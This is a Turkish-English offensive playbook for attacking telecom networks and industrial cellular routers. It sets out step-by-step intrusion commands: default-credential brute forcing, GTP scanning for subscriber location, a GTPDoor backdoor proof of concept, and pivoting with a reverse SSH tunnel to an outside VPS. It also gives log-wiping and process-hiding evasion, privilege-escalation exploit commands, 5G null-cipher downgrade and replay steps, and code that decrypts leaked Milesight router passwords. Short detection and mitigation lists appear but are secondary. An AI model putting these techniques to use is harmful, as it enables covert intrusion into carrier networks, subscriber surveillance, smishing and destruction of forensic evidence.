Telecom Network Exploitation (GTP / Roaming Environments)

Reading time: 13 minutes

1. Recon & Initial Access

1.1 Default OSS / NE Accounts

Birçok vendor network elemanı, root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, … gibi hard-coded SSH/Telnet kullanıcılarıyla gelir. Özel bir wordlist brute-force başarısını dramatik şekilde artırır:

hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt

Cihaz yalnızca management VRF sunuyorsa, önce bir jump host üzerinden pivot yapın (aşağıdaki «SGSN Emu Tunnel» bölümüne bakın).

1.2 Host Discovery inside GRX/IPX

Çoğu GRX operatörü hâlâ omurga boyunca ICMP echo'ya izin veriyor. GTP-C dinleyicilerini hızlıca haritalamak için masscan'ı yerleşik gtpv1 UDP probes ile birleştirin:

masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55

2. Aboneleri Keşfetme – cordscan

Aşağıdaki Go aracı GTP-C Create PDP Context Request paketleri hazırlar ve yanıtları kaydeder. Her yanıt, sorgulanan IMSI'ye hizmet eden mevcut SGSN / MME'yi ve bazen abonenin ziyaret ettiği PLMN'i ortaya çıkarır.

# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap

Anahtar seçenekler:

• --imsi Hedef abone IMSI'si
• --oper Home / HNI (MCC+MNC)
• -w Ham paketleri pcap dosyasına yaz

Binary içindeki önemli sabitler, taramaları genişletmek için yamalanabilir:

pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"

3. GTP Üzerinden Kod Çalıştırma – GTPDoor

GTPDoor küçük bir ELF servisidir; UDP 2123'e bind olur ve gelen her GTP-C paketini parse eder. Payload önceden paylaşılan bir tag ile başlıyorsa, kalan kısmı AES-128-CBC ile şifre çözülür ve /bin/sh -c ile çalıştırılır. stdout/stderr, hiçbir dışa yönelik oturum oluşturulmayacak şekilde Echo Response mesajları içinde dışarı aktarılır.

Minimal PoC paketi (Python):

import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))

Tespit:

• SGSN IP'lerine unbalanced Echo Requests gönderen herhangi bir host
• message type = 1 (Echo) iken GTP version flag'ın 1 olarak ayarlanmış olması – spesifikasyondan sapma

4. Çekirdek Üzerinden Pivoting

4.1 sgsnemu + SOCKS5

OsmoGGSN gerçek bir GGSN/PGW'ye karşı establish a PDP context towards a real GGSN/PGW kurabilen bir SGSN emülatörü ile gelir. Kurulum tamamlandığında, Linux roaming peer tarafından erişilebilen yeni bir tun0 arayüzü alır.

sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy

Uygun firewall hair-pinning ile bu tünel signalling-only VLAN'larını atlayarak sizi doğrudan data plane'e ulaştırır.

4.2 SSH Reverse Tunnel Port 53 üzerinden

DNS genellikle roaming altyapılarında her zaman açıktır. VPS'inizde :53'te dinleyen dahili bir SSH servisini dışarıya açın ve daha sonra evden geri bağlanın:

ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com

VPS üzerinde GatewayPorts yes'in etkin olduğunu kontrol edin.

5. Gizli Kanallar

Tüm implantlar, ikili dosyalarını timestomp eden ve çöktüklerinde re-spawn eden watchdog'lar uygular.

6. Savunmadan Kaçınma Hızlı Başvuru

# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux

7. Legacy NE üzerinde Privilege Escalation

# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py

Temizleme ipucu:

userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c

8. Araç Kutusu

• cordscan, GTPDoor, EchoBackdoor, NoDepDNS – önceki bölümlerde açıklanan özel araçlar.
• FScan : intranet TCP taramaları (fscan -p 22,80,443 10.0.0.0/24)
• Responder : LLMNR/NBT-NS rogue WPAD
• Microsocks + ProxyChains : hafif SOCKS5 pivoting
• FRP (≥0.37) : NAT traversal / asset bridging

9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay

5G kayıt prosedürü NGAP üzerinde NAS (Non-Access Stratum) üzerinden çalışır. Security Mode Command/Complete ile NAS güvenliği etkinleştirilene kadar, ilk mesajlar doğrulanmamış ve şifrelenmemiştir. Bu ön-güvenlik penceresi, N2 trafiğini gözlemleyebildiğiniz veya değiştirebildiğiniz durumlarda (ör. çekirdek içinde on-path, rogue gNB veya testbed) birden fazla saldırı yolunu mümkün kılar.

Kayıt akışı (basitleştirilmiş):

• Registration Request: UE SUCI (şifrelenmiş SUPI) ve yetenekleri gönderir.
• Authentication: AMF/AUSF RAND/AUTN gönderir; UE RES* döner.
• Security Mode Command/Complete: NAS bütünlüğü ve şifreleme müzakere edilir ve etkinleştirilir.
• PDU Session Establishment: IP/QoS kurulumu.

Laboratuvar kurulum ipuçları (RF dışı):

• Core: Open5GS varsayılan dağıtımı akışları yeniden üretmek için yeterlidir.
• UE: simulator veya test UE; Wireshark ile decode edin.
• Active tooling: 5GReplay (NGAP içinde NAS yakala/değiştir/yeniden oynat), Sni5Gect (tam bir rogue gNB kurmadan NAS'ı anlık sniff/patch/inject yapar).
• Wireshark için faydalı display filtreleri:
• ngap.procedure_code == 15 (InitialUEMessage)
• nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request)

9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI

Beklenen: UE/USIM SUCI (home-network açık anahtarı ile şifrelenmiş SUPI) göndermelidir. Registration Request içinde düz metin SUPI/IMSI bulunması, kalıcı abone takibini mümkün kılan bir gizlilik hatasını işaret eder.

Nasıl test edilir:

• InitialUEMessage içindeki ilk NAS mesajını yakalayın ve Mobile Identity IE'yi inceleyin.
• Wireshark hızlı kontrolleri:
• Bunun SUCI olarak decode etmesi gerekir, IMSI değil.
• Filtre örnekleri: nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci mevcut olmalı; bunun yokluğu ve imsi varlığı sızıntı gösterir.

Toplanacaklar:

• Eğer açığa çıkmışsa MCC/MNC/MSIN; UE başına loglayın ve zaman/konum boyunca takip edin.

Etkisiz hale getirme:

• Yalnızca SUCI destekleyen UE/USIM uygulanmasını zorlayın; initial NAS içinde herhangi bir IMSI/SUPI görülmesinde alarm verin.

9.2 Capability bidding-down to null algorithms (EEA0/EIA0)

Arka plan:

• UE, Registration Request içindeki UE Security Capability IE'sinde desteklediği EEA (şifreleme) ve EIA (bütünlük) algoritmalarını bildirir.
• Yaygın eşlemeler: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 null algoritmalardır.

Sorun:

• Registration Request bütünlük korumalı olmadığı için, on-path bir saldırgan yetenek bitlerini temizleyerek daha sonra Security Mode Command sırasında EEA0/EIA0 seçiminde zorlayabilir. Bazı yığınlar acil servisler dışında null algoritmalarına yanlışlıkla izin verebilir.

Saldırı adımları:

• InitialUEMessage'ı yakalayın ve NAS UE Security Capability'yi yalnızca EEA0/EIA0 gösterecek şekilde değiştirin.
• Sni5Gect ile NAS mesajını hooklayıp iletmeden önce capability bitlerini patchleyin.
• AMF'nin null şifreleme/bütünlüğü kabul edip etmediğini gözlemleyin ve Security Mode'un EEA0/EIA0 ile tamamlanıp tamamlanmadığını kontrol edin.

Doğrulama/görünürlük:

• Wireshark'ta Security Mode Command/Complete sonrası seçilen algoritmaları doğrulayın.
• Örnek pasif sniffer çıktısı:

Encyrption in use [EEA0]
Integrity in use [EIA0, EIA1, EIA2]
SUPI (MCC+MNC+MSIN) 9997000000001

Azaltma önlemleri (zorunlu):

• AMF/policy'yi EEA0/EIA0'ı yalnızca kesinlikle zorunlu olduğu durumlar (ör. acil çağrılar) hariç reddedecek şekilde yapılandırın.
• En azından EEA2/EIA2 uygulanmasını tercih edin; null algoritmaları müzakere eden herhangi bir NAS security context için kayıt tutma ve alarm mekanizmaları kurun.

9.3 İlk Registration Request'in Replay'i (pre-security NAS)

İlk NAS bütünlük ve tazelik sağlamadığından, yakalanmış InitialUEMessage+Registration Request AMF'ye tekrar oynatılabilir.

PoC rule for 5GReplay to forward matching replays:

<beginning>
<property value="THEN"
property_id="101"
type_property="FORWARD"
description="Forward InitialUEMessage with Registration Request">

<!-- Trigger on NGAP InitialUEMessage (procedureCode == 15) -->
<event value="COMPUTE"
event_id="1"
description="Trigger: InitialUEMessage"
boolean_expression="ngap.procedure_code == 15"/>

<!-- Context match on NAS Registration Request (message_type == 65) -->
<event value="COMPUTE"
event_id="2"
description="Context: Registration Request"
boolean_expression="nas_5g.message_type == 65"/>

</property>
</beginning>

What to observe:

• Whether AMF accepts the replay and proceeds to Authentication; lack of freshness/context validation indicates exposure.

Mitigations:

• Enforce replay protection/context binding at AMF; rate-limit and correlate per-GNB/UE.

9.4 Tooling pointers (reproducible)

• Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS.
• Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration.
• 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule.
• Sni5Gect: live sniff/modify/inject NAS control-plane to coerce null algorithms or perturb authentication sequences.

9.5 Defensive checklist

• Continuously inspect Registration Request for plaintext SUPI/IMSI; block offending devices/USIMs.
• Reject EEA0/EIA0 except for narrowly defined emergency procedures; require at least EEA2/EIA2.
• Detect rogue or misconfigured infrastructure: unauthorized gNB/AMF, unexpected N2 peers.
• Alert on NAS security modes that result in null algorithms or frequent replays of InitialUEMessage.

10. Industrial Cellular Routers – Unauthenticated SMS API Abuse (Milesight UR5X/UR32/UR35/UR41) and Credential Recovery (CVE-2023-43261)

Abusing exposed web APIs of industrial cellular routers enables stealthy, carrier-origin smishing at scale. Milesight UR-series routers expose a JSON-RPC–style endpoint at /cgi. When misconfigured, the API can be queried without authentication to list SMS inbox/outbox and, in some deployments, to send SMS.

Typical unauthenticated requests (same structure for inbox/outbox):

POST /cgi HTTP/1.1
Host: <router>
Content-Type: application/json

{ "base": "query_outbox", "function": "query_outbox", "values": [ {"page":1,"per_page":50} ] }

{ "base": "query_inbox", "function": "query_inbox", "values": [ {"page":1,"per_page":50} ] }

Cevaplar timestamp, content, phone_number (E.164) ve status (success veya failed) gibi alanlar içerir. Aynı numaraya tekrarlanan failed gönderimleri genellikle saldırganların, blasting'den önce bir router/SIM'in teslimat yapıp yapamayacağını doğrulamak için yaptığı “capability checks” olur.

Örnek curl ile SMS metadata exfiltrate etme:

curl -sk -X POST http://<router>/cgi \
-H 'Content-Type: application/json' \
-d '{"base":"query_outbox","function":"query_outbox","values":[{"page":1,"per_page":100}]}'

Auth artefaktları hakkında notlar:

• Bazı trafik bir auth cookie içerebilir, ancak yönetim arayüzü Internet-facing olduğunda, açığa çıkmış cihazların büyük bir kısmı query_inbox/query_outbox isteklerine herhangi bir doğrulama olmadan yanıt verir.
• Auth gerektiren ortamlarda, previously-leaked credentials (bkz. aşağıda) erişimi geri sağlar.

Kimlik bilgisi kurtarma yolu – CVE-2023-43261:

• Etkilenen familyalar: UR5X, UR32L, UR32, UR35, UR41 (pre v35.3.0.7).
• Sorun: web-served logs (ör. httpd.log) /lang/log/ altında kimlik doğrulama olmadan erişilebilir ve admin login olaylarını içerir; parolalar client-side JavaScript'te bulunan hardcoded AES key/IV kullanılarak şifrelenmiş olarak kayıtlıdır.
• Pratik erişim ve decrypt:

curl -sk http://<router>/lang/log/httpd.log | sed -n '1,200p'
# Look for entries like: {"username":"admin","password":"<base64>"}

Leaked parolaları decrypt etmek için minimal Python (AES-128-CBC, hardcoded key/IV):

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
KEY=b'1111111111111111'; IV=b'2222222222222222'
enc_b64='...'  # value from httpd.log
print(unpad(AES.new(KEY, AES.MODE_CBC, IV).decrypt(base64.b64decode(enc_b64)), AES.block_size).decode())

Av ve tespit fikirleri (ağ):

• Alert on unauthenticated POST /cgi whose JSON body contains base/function set to query_inbox or query_outbox.
• Track repeated POST /cgi bursts followed by status":"failed" entries across many unique numbers from the same source IP (capability testing).
• Inventory Internet-exposed Milesight routers; restrict management to VPN; disable SMS features unless required; upgrade to ≥ v35.3.0.7; rotate credentials and review SMS logs for unknown sends.

Shodan/OSINT pivotları (sahada görülen örnekler):

• http.html:"rt_title" matches Milesight router panels.
• Google dorking for exposed logs: "/lang/log/system" ext:log.

Operasyonel etki: router'lar içinde gerçek carrier SIM'lerinin kullanılması phishing için çok yüksek SMS deliverability/credibility sağlar; inbox/outbox exposure leaks sensitive metadata at scale.

Tespit Fikirleri

1. Any device other than an SGSN/GGSN establishing Create PDP Context Requests.
2. Non-standard ports (53, 80, 443) receiving SSH handshakes from internal IPs.
3. Frequent Echo Requests without corresponding Echo Responses – might indicate GTPDoor beacons.
4. High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields.
5. 5G: InitialUEMessage carrying NAS Registration Requests repeated from identical endpoints (replay signal).
6. 5G: NAS Security Mode negotiating EEA0/EIA0 outside emergency contexts.

Referanslar

• Palo Alto Unit42 – Infiltration of Global Telecom Networks
• 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
• 3GPP TS 29.281 – GTPv2-C (v17.6.0)
• Demystifying 5G Security: Understanding the Registration Protocol
• 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS
• 3GPP TS 33.501 – Security architecture and procedures for 5G System
• Silent Smishing: The Hidden Abuse of Cellular Router APIs (Sekoia.io)
• CVE-2023-43261 – NVD
• CVE-2023-43261 PoC (win3zz)